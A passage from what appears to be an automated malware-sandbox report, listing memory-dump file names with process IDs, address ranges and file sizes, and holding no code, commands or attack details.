                                                                                                                                                        • memory/1352-180-0x000001F2F2790000-0x000001F2F2800000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/1376-186-0x00000186BEA00000-0x00000186BEA70000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/1588-368-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/1936-244-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/1964-182-0x0000011193180000-0x00000111931F0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2196-350-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2316-333-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2504-150-0x000002978EA40000-0x000002978EAB0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2504-304-0x000002978EB20000-0x000002978EB90000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2540-312-0x0000019892840000-0x00000198928B0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2540-157-0x0000019891D20000-0x0000019891D90000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2680-349-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2772-116-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2780-138-0x0000000004AA0000-0x0000000004AFC000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          368KB

                                                                                                                                                        • memory/2780-136-0x0000000004982000-0x0000000004A83000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.0MB

                                                                                                                                                        • memory/2780-119-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2796-188-0x000001FE32860000-0x000001FE328D0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2804-190-0x000002603B7A0000-0x000002603B810000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2824-120-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2824-126-0x00000000001B0000-0x00000000001B1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/2824-128-0x00000000006B0000-0x00000000006B1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/2824-131-0x00000000008D0000-0x00000000008EC000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          112KB

                                                                                                                                                        • memory/2824-144-0x0000000002360000-0x0000000002362000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/2824-140-0x00000000006C0000-0x00000000006C1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/2844-200-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2844-203-0x0000000003120000-0x0000000003122000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/2856-292-0x00000272AB740000-0x00000272AB7B0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/2856-290-0x00000272AB0F0000-0x00000272AB13B000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          300KB

                                                                                                                                                        • memory/2856-161-0x00000272AB160000-0x00000272AB1D0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/3152-345-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3160-303-0x00000000037B0000-0x00000000037C0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/3160-246-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3160-288-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/3472-365-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3792-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/3792-195-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3888-231-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4164-210-0x000002985EF00000-0x000002985F001000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.0MB

                                                                                                                                                        • memory/4164-204-0x00007FF6E04B4060-mapping.dmp
                                                                                                                                                        • memory/4164-208-0x000002985C860000-0x000002985C8D0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          448KB

                                                                                                                                                        • memory/4164-207-0x000002985C770000-0x000002985C7BB000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          300KB

                                                                                                                                                        • memory/4220-346-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4240-353-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4288-243-0x00000000009F0000-0x0000000000A02000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          72KB

                                                                                                                                                        • memory/4288-237-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4288-242-0x0000000000430000-0x00000000004DE000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          696KB

                                                                                                                                                        • memory/4292-356-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4336-241-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4372-342-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4424-250-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4468-211-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4468-215-0x0000000002D00000-0x0000000002D02000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/4512-216-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4512-220-0x0000000002260000-0x0000000002262000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/4512-228-0x0000000002264000-0x0000000002265000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4512-227-0x0000000002262000-0x0000000002264000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/4528-369-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4596-221-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4596-224-0x0000000000F10000-0x0000000000F1D000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          52KB

                                                                                                                                                        • memory/4644-253-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4644-233-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4712-232-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4732-256-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4860-360-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4896-325-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4896-344-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4960-230-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4964-265-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4992-352-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5048-348-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5056-262-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5076-357-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5096-234-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5096-240-0x0000000003080000-0x0000000003082000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/5096-258-0x0000000003084000-0x0000000003085000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5136-359-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5204-270-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5276-361-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5352-275-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5388-366-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5404-343-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5472-328-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5480-294-0x0000000002E60000-0x0000000002EBC000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          368KB

                                                                                                                                                        • memory/5480-287-0x00000000046A8000-0x00000000047A9000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.0MB

                                                                                                                                                        • memory/5480-278-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5544-282-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5568-284-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5652-367-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5680-364-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5808-355-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5812-363-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5828-347-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5832-354-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5852-307-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5928-362-0x0000000000402F68-mapping.dmp
                                                                                                                                                        • memory/5944-351-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/6056-336-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/6116-322-0x0000000000000000-mapping.dmp